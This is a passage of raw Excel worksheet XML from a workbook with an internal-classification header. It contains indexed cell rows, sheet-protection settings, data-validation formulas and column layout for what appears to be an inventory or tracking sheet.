      </c>
    </row>
    <row r="95" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A95" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B95" s="1"/>
      <c r="C95" s="1"/>
      <c r="D95" s="1"/>
      <c r="E95" s="1" t="s">
        <v>3484</v>
      </c>
      <c r="F95" s="1"/>
      <c r="G95" s="1"/>
      <c r="H95" s="1" t="s">
        <v>2441</v>
      </c>
      <c r="I95" s="1" t="s">
        <v>2460</v>
      </c>
      <c r="J95" s="1"/>
      <c r="K95" s="1"/>
      <c r="L95" s="1"/>
      <c r="M95" s="1"/>
      <c r="N95" s="1"/>
      <c r="O95" s="1"/>
      <c r="P95" s="1"/>
      <c r="Q95" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R95" s="1"/>
      <c r="S95" s="1"/>
      <c r="T95" s="1"/>
      <c r="U95" s="1"/>
      <c r="V95" s="1"/>
      <c r="W95" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="96" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A96" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B96" s="1"/>
      <c r="C96" s="1"/>
      <c r="D96" s="1"/>
      <c r="E96" s="1" t="s">
        <v>3485</v>
      </c>
      <c r="F96" s="1"/>
      <c r="G96" s="1"/>
      <c r="H96" s="1" t="s">
        <v>2441</v>
      </c>
      <c r="I96" s="1" t="s">
        <v>2460</v>
      </c>
      <c r="J96" s="1"/>
      <c r="K96" s="1"/>
      <c r="L96" s="1"/>
      <c r="M96" s="1"/>
      <c r="N96" s="1"/>
      <c r="O96" s="1"/>
      <c r="P96" s="1"/>
      <c r="Q96" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R96" s="1"/>
      <c r="S96" s="1"/>
      <c r="T96" s="1"/>
      <c r="U96" s="1"/>
      <c r="V96" s="1"/>
      <c r="W96" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="97" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A97" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B97" s="1"/>
      <c r="C97" s="1"/>
      <c r="D97" s="1"/>
      <c r="E97" s="1" t="s">
        <v>3486</v>
      </c>
      <c r="F97" s="1"/>
      <c r="G97" s="1"/>
      <c r="H97" s="1" t="s">
        <v>2441</v>
      </c>
      <c r="I97" s="1" t="s">
        <v>2460</v>
      </c>
      <c r="J97" s="1"/>
      <c r="K97" s="1"/>
      <c r="L97" s="1"/>
      <c r="M97" s="1"/>
      <c r="N97" s="1"/>
      <c r="O97" s="1"/>
      <c r="P97" s="1"/>
      <c r="Q97" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R97" s="1"/>
      <c r="S97" s="1"/>
      <c r="T97" s="1"/>
      <c r="U97" s="1"/>
      <c r="V97" s="1"/>
      <c r="W97" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="98" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A98" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B98" s="1"/>
      <c r="C98" s="1"/>
      <c r="D98" s="1"/>
      <c r="E98" s="1" t="s">
        <v>3487</v>
      </c>
      <c r="F98" s="1"/>
      <c r="G98" s="1"/>
      <c r="H98" s="1" t="s">
        <v>2441</v>
      </c>
      <c r="I98" s="1" t="s">
        <v>2460</v>
      </c>
      <c r="J98" s="1"/>
      <c r="K98" s="1"/>
      <c r="L98" s="1"/>
      <c r="M98" s="1"/>
      <c r="N98" s="1"/>
      <c r="O98" s="1"/>
      <c r="P98" s="1"/>
      <c r="Q98" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R98" s="1"/>
      <c r="S98" s="1"/>
      <c r="T98" s="1"/>
      <c r="U98" s="1"/>
      <c r="V98" s="1"/>
      <c r="W98" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="99" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A99" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B99" s="1"/>
      <c r="C99" s="1"/>
      <c r="D99" s="1"/>
      <c r="E99" s="1" t="s">
        <v>3488</v>
      </c>
      <c r="F99" s="1"/>
      <c r="G99" s="1"/>
      <c r="H99" s="1" t="s">
        <v>2441</v>
      </c>
      <c r="I99" s="1" t="s">
        <v>2460</v>
      </c>
      <c r="J99" s="1"/>
      <c r="K99" s="1"/>
      <c r="L99" s="1"/>
      <c r="M99" s="1"/>
      <c r="N99" s="1"/>
      <c r="O99" s="1"/>
      <c r="P99" s="1"/>
      <c r="Q99" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R99" s="1"/>
      <c r="S99" s="1"/>
      <c r="T99" s="1"/>
      <c r="U99" s="1"/>
      <c r="V99" s="1"/>
      <c r="W99" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="100" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A100" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B100" s="1"/>
      <c r="C100" s="1"/>
      <c r="D100" s="1"/>
      <c r="E100" s="1" t="s">
        <v>3489</v>
      </c>
      <c r="F100" s="1"/>
      <c r="G100" s="1"/>
      <c r="H100" s="1" t="s">
        <v>3475</v>
      </c>
      <c r="I100" s="1" t="s">
        <v>2451</v>
      </c>
      <c r="J100" s="1"/>
      <c r="K100" s="1"/>
      <c r="L100" s="1"/>
      <c r="M100" s="1"/>
      <c r="N100" s="1"/>
      <c r="O100" s="1"/>
      <c r="P100" s="1"/>
      <c r="Q100" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R100" s="1"/>
      <c r="S100" s="1"/>
      <c r="T100" s="1"/>
      <c r="U100" s="1"/>
      <c r="V100" s="1"/>
      <c r="W100" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="101" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A101" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B101" s="1"/>
      <c r="C101" s="1"/>
      <c r="D101" s="1"/>
      <c r="E101" s="1" t="s">
        <v>3490</v>
      </c>
      <c r="F101" s="1"/>
      <c r="G101" s="1"/>
      <c r="H101" s="1" t="s">
        <v>3475</v>
      </c>
      <c r="I101" s="1" t="s">
        <v>2442</v>
      </c>
      <c r="J101" s="1"/>
      <c r="K101" s="1"/>
      <c r="L101" s="1"/>
      <c r="M101" s="1"/>
      <c r="N101" s="1"/>
      <c r="O101" s="1"/>
      <c r="P101" s="1"/>
      <c r="Q101" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R101" s="1"/>
      <c r="S101" s="1"/>
      <c r="T101" s="1"/>
      <c r="U101" s="1"/>
      <c r="V101" s="1"/>
      <c r="W101" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="102" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A102" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B102" s="1"/>
      <c r="C102" s="1"/>
      <c r="D102" s="1"/>
      <c r="E102" s="1" t="s">
        <v>3491</v>
      </c>
      <c r="F102" s="1"/>
      <c r="G102" s="1"/>
      <c r="H102" s="1" t="s">
        <v>3475</v>
      </c>
      <c r="I102" s="1" t="s">
        <v>2442</v>
      </c>
      <c r="J102" s="1"/>
      <c r="K102" s="1"/>
      <c r="L102" s="1"/>
      <c r="M102" s="1"/>
      <c r="N102" s="1"/>
      <c r="O102" s="1"/>
      <c r="P102" s="1"/>
      <c r="Q102" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R102" s="1"/>
      <c r="S102" s="1"/>
      <c r="T102" s="1"/>
      <c r="U102" s="1"/>
      <c r="V102" s="1"/>
      <c r="W102" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection algorithmName="SHA-512" hashValue="wZTJZ2P2qp16hJCJNDrQlBCyQEllSMOhLsJACChYX8SEQBfMZozN8n/wKnfbEL02yvpmcrZTnPMgjYXP3LBeOw==" saltValue="YGvRp9M4glVybw+ash6Kxg==" spinCount="100000" sheet="1" sort="0" autoFilter="0" pivotTables="0"/>
  <autoFilter ref="A1:W102" xr:uid="{999DFF60-5D57-4A0F-A644-23E1A4E9532E}"/>
  <dataValidations count="3">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="K14:L14" xr:uid="{24D54025-F7EC-49AD-B226-0C5FF50FB272}">
      <formula1>INDIRECT(I14)</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="P12:P13" xr:uid="{00B03AF5-FE0A-43D2-8EB2-8D34FE93A66C}">
      <formula1>INDIRECT(#REF!)</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="J2:J102" xr:uid="{3E115D50-FAEA-4283-944B-B80A5674058D}">
      <formula1>INDIRECT(I65)</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHeader>
  </headerFooter>
  <legacyDrawing r:id="rId2"/>
  <legacyDrawingHF r:id="rId3"/>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{CCE6A557-97BC-4b89-ADB6-D9C93CAAB3DF}">
      <x14:dataValidations xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" count="1">
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{3B996F1D-7FCE-427D-832A-2B38E3F6A1CB}">
          <x14:formula1>
            <xm:f>Lista!$A$1:$R$1</xm:f>
          </x14:formula1>
          <xm:sqref>I2:I102</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2B503-26B9-4216-B8C4-44B6235A4267}">
  <sheetPr codeName="Hoja9"/>
  <dimension ref="A1:W204"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="L214" sqref="L214"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="15.75" customHeight="1" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="13.90625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="16.6328125" customWidth="1"/>
    <col min="3" max="3" width="21.453125" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="21" style="47" customWidth="1"/>
    <col min="5" max="5" width="59.54296875" customWidth="1"/>
    <col min="6" max="6" width="9" customWidth="1"/>
    <col min="7" max="7" width="41.36328125" style="50" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="43.08984375" customWidth="1"/>
    <col min="9" max="9" width="48.90625" customWidth="1"/>
    <col min="10" max="10" width="27.90625" customWidth="1"/>
    <col min="11" max="12" width="33.36328125" customWidth="1"/>
    <col min="13" max="13" width="38.6328125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="27.90625" customWidth="1"/>
    <col min="15" max="15" width="25.36328125" customWidth="1"/>
    <col min="16" max="16" width="36.453125" customWidth="1"/>
    <col min="17" max="17" width="40.36328125" customWidth="1"/>
    <col min="18" max="18" width="11.08984375" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="9.90625" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="10.54296875" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="10.36328125" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="10.36328125" customWidth="1"/>
    <col min="23" max="23" width="16.08984375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A1" s="28" t="s">
        <v>1</v>
      </c>
      <c r="B1" s="46" t="s">
        <v>51</v>
      </c>
      <c r="C1" s="46" t="s">
        <v>52</v>
      </c>
      <c r="D1" s="46" t="s">
        <v>53</v>
      </c>
      <c r="E1" s="29" t="s">
        <v>54</v>
      </c>
      <c r="F1" s="30" t="s">
        <v>55</v>
      </c>
      <c r="G1" s="30" t="s">
        <v>56</v>
      </c>
      <c r="H1" s="29" t="s">
        <v>57</v>
      </c>
      <c r="I1" s="29" t="s">
        <v>58</v>
      </c>
      <c r="J1" s="29" t="s">
        <v>59</v>
      </c>
      <c r="K1" s="29" t="s">
        <v>8</v>
      </c>
      <c r="L1" s="29" t="s">
        <v>60</v>
      </c>
      <c r="M1" s="29" t="s">
        <v>61</v>
      </c>
      <c r="N1" s="29" t="s">
        <v>62</v>
      </c>
      <c r="O1" s="29" t="s">
        <v>63</v>
      </c>
      <c r="P1" s="29" t="s">
        <v>64</v>
      </c>
      <c r="Q1" s="31" t="s">
        <v>65</v>
      </c>
      <c r="R1" s="31" t="s">
        <v>66</v>
      </c>
      <c r="S1" s="31" t="s">
        <v>67</v>
      </c>
      <c r="T1" s="31" t="s">
        <v>68</v>
      </c>
      <c r="U1" s="31" t="s">
        <v>69</v>
      </c>
      <c r="V1" s="53" t="s">
        <v>70</v>
      </c>
      <c r="W1" s="29" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A2" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B2" s="51">
        <v>44314.160801215279</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>297</v>
      </c>
      <c r="D2" s="26">
        <v>102</v>
      </c>
      <c r="E2" s="72" t="s">
        <v>298</v>
      </c>
      <c r="F2" s="26">
        <v>102</v>
      </c>
      <c r="G2" s="57" t="s">
        <v>299</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>300</v>
      </c>
      <c r="I2" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K2" s="1" t="s">
        <v>38</v>
      </c>
      <c r="L2" s="1" t="s">
        <v>38</v>
      </c>
      <c r="M2" s="1" t="s">
        <v>38</v>
      </c>
      <c r="N2" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O2" s="1"/>
      <c r="P2" s="1" t="s">
        <v>302</v>
      </c>
      <c r="Q2" s="2" t="s">
        <v>3629</v>
      </c>
      <c r="R2" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S2" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T2" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U2" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V2" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W2" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="3" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A3" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B3" s="51">
        <v>44314.601553136577</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>297</v>
      </c>
      <c r="D3" s="26">
        <v>202</v>
      </c>
      <c r="E3" s="72" t="s">
        <v>298</v>
      </c>
      <c r="F3" s="26">
        <v>202</v>
      </c>
      <c r="G3" s="57" t="s">
        <v>299</v>
      </c>
      <c r="H3" s="1" t="s">
        <v>305</v>
      </c>
      <c r="I3" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J3" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K3" s="1" t="s">
        <v>38</v>
      </c>
      <c r="L3" s="1" t="s">
        <v>38</v>
      </c>
      <c r="M3" s="1" t="s">
        <v>38</v>
      </c>
      <c r="N3" s="1" t="s">
        <v>38</v>
      </c>
      <c r="O3" s="1"/>
      <c r="P3" s="1" t="s">
        <v>302</v>
      </c>
      <c r="Q3" s="2" t="s">
        <v>3630</v>
      </c>
      <c r="R3" s="82">
        <v>939414</v>
      </c>
      <c r="S3" s="82">
        <v>768053</v>
      </c>
      <c r="T3" s="82">
        <v>2040383</v>
      </c>
      <c r="U3" s="82">
        <v>4058637</v>
      </c>
      <c r="V3" s="82">
        <v>8844910</v>
      </c>
      <c r="W3" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="4" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A4" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B4" s="51">
        <v>43161.686450138892</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>524</v>
      </c>
      <c r="D4" s="26">
        <v>100</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>525</v>
      </c>
      <c r="F4" s="26">
        <v>100</v>
      </c>
      <c r="G4" s="57" t="s">
        <v>526</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>527</v>
      </c>
      <c r="I4" s="1" t="s">
        <v>528</v>
      </c>
      <c r="J4" s="1" t="s">
        <v>529</v>
      </c>
      <c r="K4" s="1" t="s">
        <v>39</v>
      </c>
      <c r="L4" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M4" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N4" s="1"/>
      <c r="O4" s="1"/>
      <c r="P4" s="1" t="s">
        <v>530</v>
      </c>
      <c r="Q4" s="1" t="s">
        <v>3631</v>
      </c>
      <c r="R4" s="82">
        <v>20028</v>
      </c>
      <c r="S4" s="82">
        <v>16725</v>
      </c>
      <c r="T4" s="82">
        <v>41850</v>
      </c>
      <c r="U4" s="82">
        <v>76931</v>
      </c>
      <c r="V4" s="82">
        <v>70855</v>
      </c>
      <c r="W4" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="5" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A5" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B5" s="51">
        <v>43714.759844074077</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>1667</v>
      </c>
      <c r="D5" s="26">
        <v>100</v>
      </c>
      <c r="E5" s="1" t="s">
        <v>1668</v>
      </c>
      <c r="F5" s="26">
        <v>100</v>
      </c>
      <c r="G5" s="57" t="s">
        <v>1669</v>
      </c>
      <c r="H5" s="1" t="s">
        <v>1670</v>
      </c>
      <c r="I5" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J5" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K5" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L5" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M5" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N5" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O5" s="1"/>
      <c r="P5" s="1"/>
      <c r="Q5" s="1" t="s">
        <v>3632</v>
      </c>
      <c r="R5" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S5" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T5" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U5" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V5" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W5" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="6" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A6" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B6" s="51">
        <v>43763.442818055555</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>2142</v>
      </c>
      <c r="D6" s="26">
        <v>101</v>
      </c>
      <c r="E6" s="1" t="s">
        <v>2143</v>
      </c>
      <c r="F6" s="26">
        <v>101</v>
      </c>
      <c r="G6" s="57" t="s">
        <v>1672</v>
      </c>
      <c r="H6" s="1" t="s">
        <v>2144</v>
      </c>
      <c r="I6" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J6" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K6" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L6" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M6" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N6" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O6" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P6" s="1"/>
      <c r="Q6" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R6" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S6" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T6" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U6" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V6" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W6" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="7" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A7" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B7" s="51">
        <v>44184.075663888892</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>2309</v>
      </c>
      <c r="D7" s="26">
        <v>100</v>
      </c>
      <c r="E7" s="1" t="s">
        <v>2310</v>
      </c>
      <c r="F7" s="26">
        <v>100</v>
      </c>
      <c r="G7" s="57" t="s">
        <v>2311</v>
      </c>
      <c r="H7" s="1" t="s">
        <v>2296</v>
      </c>
      <c r="I7" s="1" t="s">
        <v>203</v>
      </c>
      <c r="J7" s="1" t="s">
        <v>204</v>
      </c>
      <c r="K7" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L7" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M7" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N7" s="1"/>
      <c r="O7" s="1"/>
      <c r="P7" s="1"/>
      <c r="Q7" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R7" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S7" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T7" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U7" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V7" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W7" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="8" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A8" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B8" s="51">
        <v>43481.669218506948</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D8" s="26">
        <v>111</v>
      </c>
      <c r="E8" s="1" t="s">
        <v>2599</v>
      </c>
      <c r="F8" s="26">
        <v>102</v>
      </c>
      <c r="G8" s="57" t="s">
        <v>2600</v>
      </c>
      <c r="H8" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I8" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J8" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K8" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L8" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M8" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N8" s="1"/>
      <c r="O8" s="1" t="s">
        <v>2601</v>
      </c>
      <c r="P8" s="1"/>
      <c r="Q8" s="1" t="s">
        <v>3633</v>
      </c>
      <c r="R8" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S8" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T8" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U8" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V8" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W8" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="9" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A9" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B9" s="51">
        <v>43481.669218483796</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D9" s="26">
        <v>111</v>
      </c>
      <c r="E9" s="1" t="s">
        <v>2603</v>
      </c>
      <c r="F9" s="26">
        <v>100</v>
      </c>
      <c r="G9" s="57" t="s">
        <v>2604</v>
      </c>
      <c r="H9" s="1" t="s">
        <v>2605</v>
      </c>
      <c r="I9" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J9" s="1" t="s">
        <v>211</v>
      </c>
      <c r="K9" s="1" t="s">
        <v>30</v>
      </c>
      <c r="L9" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M9" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N9" s="1"/>
      <c r="O9" s="1" t="s">
        <v>2601</v>
      </c>
      <c r="P9" s="1"/>
      <c r="Q9" s="1" t="s">
        <v>3633</v>
      </c>
      <c r="R9" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S9" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T9" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U9" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V9" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W9" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="10" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A10" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B10" s="51">
        <v>43756.642468449078</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D10" s="26">
        <v>202</v>
      </c>
      <c r="E10" s="1" t="s">
        <v>2978</v>
      </c>
      <c r="F10" s="26">
        <v>201</v>
      </c>
      <c r="G10" s="57" t="s">
        <v>2600</v>
      </c>
      <c r="H10" s="1" t="s">
        <v>2979</v>
      </c>
      <c r="I10" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J10" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K10" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L10" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M10" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N10" s="1"/>
      <c r="O10" s="1" t="s">
        <v>2601</v>
      </c>
      <c r="P10" s="1" t="s">
        <v>1795</v>
      </c>
      <c r="Q10" s="1" t="s">
        <v>3634</v>
      </c>
      <c r="R10" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S10" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T10" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U10" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V10" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W10" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="11" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A11" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B11" s="51">
        <v>43760.624119189815</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D11" s="26">
        <v>202</v>
      </c>
      <c r="E11" s="1" t="s">
        <v>2981</v>
      </c>
      <c r="F11" s="26">
        <v>101</v>
      </c>
      <c r="G11" s="57" t="s">
        <v>2604</v>
      </c>
      <c r="H11" s="1" t="s">
        <v>2605</v>
      </c>
      <c r="I11" s="1" t="s">
        <v>210</v>
      </c>
      <c r="J11" s="1" t="s">
        <v>211</v>
      </c>
      <c r="K11" s="1" t="s">
        <v>30</v>
      </c>
      <c r="L11" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M11" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N11" s="1"/>
      <c r="O11" s="1"/>
      <c r="P11" s="1"/>
      <c r="Q11" s="1" t="s">
        <v>3634</v>
      </c>
      <c r="R11" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S11" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T11" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U11" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V11" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W11" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="12" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A12" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B12" s="51">
        <v>43020.819557442126</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D12" s="26">
        <v>111</v>
      </c>
      <c r="E12" s="1" t="s">
        <v>3371</v>
      </c>
      <c r="F12" s="26">
        <v>100</v>
      </c>
      <c r="G12" s="57" t="s">
        <v>3372</v>
      </c>
      <c r="H12" s="1" t="s">
        <v>3373</v>
      </c>
      <c r="I12" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J12" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K12" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L12" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M12" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N12" s="1"/>
      <c r="O12" s="1" t="s">
        <v>2601</v>
      </c>
      <c r="P12" s="1"/>
      <c r="Q12" s="1" t="s">
        <v>3633</v>
      </c>
      <c r="R12" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S12" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T12" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U12" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V12" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W12" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="13" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A13" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B13" s="51">
        <v>43790.925171168979</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>3433</v>
      </c>
      <c r="D13" s="26">
        <v>104</v>
      </c>
      <c r="E13" s="1" t="s">
